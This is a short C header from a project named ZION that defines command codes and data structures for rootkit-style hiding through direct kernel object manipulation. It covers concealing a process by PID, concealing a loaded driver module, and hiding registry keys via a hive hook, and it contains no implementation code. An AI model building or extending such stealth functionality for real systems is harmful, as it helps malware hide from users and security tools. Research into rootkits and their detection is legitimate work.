/*
 *      name: ZION system DKOM Def.
 *      Org Author: Liang Chen
 *      Version : 0.2
 */
#pragma once
#define MAX_DRIVER_FILE_NAME 100
#define MAX_REGISTRY_KEY_PATH 255
#define CMD_SUB_DKOM_EPROCESS_HIDE	0x0001u
#define CMD_SUB_DKOM_MODULE_HIDE	0x0002u
#define CMD_SUB_HIVE_REG_HOOK_HIDE	0x0003u
#define CMD_DKOM_EPROCESS ((CMD_MAJOR_DKOM << 16) | CMD_SUB_DKOM_EPROCESS_HIDE)
#define CMD_DKOM_MODULE ((CMD_MAJOR_DKOM << 16) | CMD_SUB_DKOM_MODULE_HIDE)
#define CMD_HIVE_REG_HOOK ((CMD_MAJOR_DKOM << 16) | CMD_SUB_HIVE_REG_HOOK_HIDE)
typedef struct _ZION_DKOM_EPROCESS_CMD_DATA
{
	DWORD pid;
} ZION_DKOM_EPROCESS_CMD_DATA, *PZION_DKOM_EPROCESS_CMD_DATA;
typedef struct _ZION_DKOM_MODULE_CMD_DATA
{
	WCHAR DriverFileName[MAX_DRIVER_FILE_NAME];
}ZION_DKOM_MODULE_CMD_DATA, *PZION_DKOM_MODULE_CMD_DATA;
typedef struct _ZION_HIVE_REG_HOOK_CMD_DATA
{
	WCHAR RegKeyPath[MAX_REGISTRY_KEY_PATH];
}ZION_HIVE_REG_HOOK_CMD_DATA, *PZION_HIVE_REG_HOOK_CMD_DATA;